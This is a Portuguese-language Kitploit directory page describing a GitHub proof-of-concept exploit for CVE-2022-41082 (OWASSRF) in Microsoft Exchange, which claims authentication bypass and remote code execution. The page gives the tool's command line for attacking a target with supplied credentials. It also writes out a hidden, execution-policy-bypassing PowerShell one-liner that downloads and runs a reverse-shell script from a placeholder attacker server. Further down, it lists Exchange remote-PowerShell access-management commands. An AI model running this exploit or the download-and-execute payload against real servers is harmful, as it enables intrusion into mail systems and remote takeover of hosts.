Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-41082 — CVE-2022-41082-poc | Kitploit
Ferramentas/GitHubGitHub/soltanali0/cve-2022-41082
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubsoltanali0/cve-2022-41082

CVE-2022-41082

CVE-2022-41082-poc

Ver Repositório
31há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-41082

Este repositório contém uma ferramenta de prova de conceito (PoC) para explorar a vulnerabilidade OWASSRF (CVE-2022-41082) em servidores Microsoft Exchange. O exploit permite que atacantes executem comandos arbitrários no servidor, comprometendo potencialmente o sistema.

Visão Geral

A ferramenta aproveita uma vulnerabilidade OWASSRF para contornar a autenticação e obter execução remota de código (RCE) em um servidor Exchange. Ao explorar essa vulnerabilidade, um atacante pode executar comandos como se fosse um usuário autenticado, levando a sérias implicações de segurança.

Como Funciona

  1. Contorno de Autenticação: A ferramenta se conecta ao servidor Exchange alvo, contornando mecanismos de autenticação usando requisições manipuladas.
  2. Execução Remota de Código: Após fazer login com sucesso, a ferramenta abre uma sessão que permite a execução de comandos no servidor Exchange.
  3. Execução de Comandos: Os usuários podem especificar comandos a serem executados no servidor, permitindo várias ações, incluindo manipulação de arquivos, operações de rede ou estabelecimento de shells reversos.

Nota Importante

Ao usar esta ferramenta, por favor certifique-se de manter a mesma sessão do Exchange Management Shell aberta. É crucial habilitar o acesso remoto ao PowerShell para pelo menos um usuário após desabilitá-lo para outros. Caso contrário, você pode perder o acesso ao Management Shell em todos os servidores Exchange.

Comandos para Gerenciar Acesso ao PowerShell

Aqui estão alguns comandos úteis do PowerShell para verificar e gerenciar quem tem acesso:

Verificar Acesso ao PowerShell

Baixar ferramenta

Para ver quais usuários têm acesso remoto ao PowerShell e quais não têm, execute:

root@kitploit:~
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'

Desabilitar Acesso ao PowerShell para Todos os Usuários

Aviso: Tenha cuidado para não fechar a janela do Exchange Management Shell a menos que você adicione pelo menos um usuário de volta.

Você pode desabilitar o acesso ao PowerShell para todos os usuários usando os seguintes comandos:

root@kitploit:~
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}

Ou use um único comando para alcançar o mesmo resultado:

root@kitploit:~
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false

Reabilitar Acesso para um Usuário Específico

Para conceder acesso remoto ao PowerShell a um usuário específico, execute:

root@kitploit:~
Set-User "guest" -RemotePowerShellEnabled $true

Solução Alternativa para Perda de Acesso ao PowerShell

Se você perder o acesso ao PowerShell para todos os usuários, pode criar um novo usuário de caixa de correio com direitos de administrador. Esse novo usuário irá contornar as políticas aplicadas, permitindo que você use o Exchange Management Shell novamente.

Usando a Ferramenta PoC

Requisitos

  • Python 3.x
  • Bibliotecas necessárias (instale via pip se necessário)

Executando a Ferramenta

Para executar a ferramenta PoC, execute o seguinte comando:

root@kitploit:~
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>

Substitua <target_IP>, <username>, <password> e <command_file> pelos seus valores específicos.

Exemplo de Comando para Shell Reverso

Você pode modificar o comando no seu cmd_file para incluir um payload de shell reverso. Por exemplo:

root@kitploit:~
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"

Este comando irá baixar e executar um script PowerShell do seu servidor, dando a você um shell reverso.

Referências

Para mais informações sobre a vulnerabilidade OWASSRF e o código PoC, visite o seguinte link: OWASSRF CVE-2022-41082 PoC e https://www.youtube.com/watch?v=c2DZYP6jc7g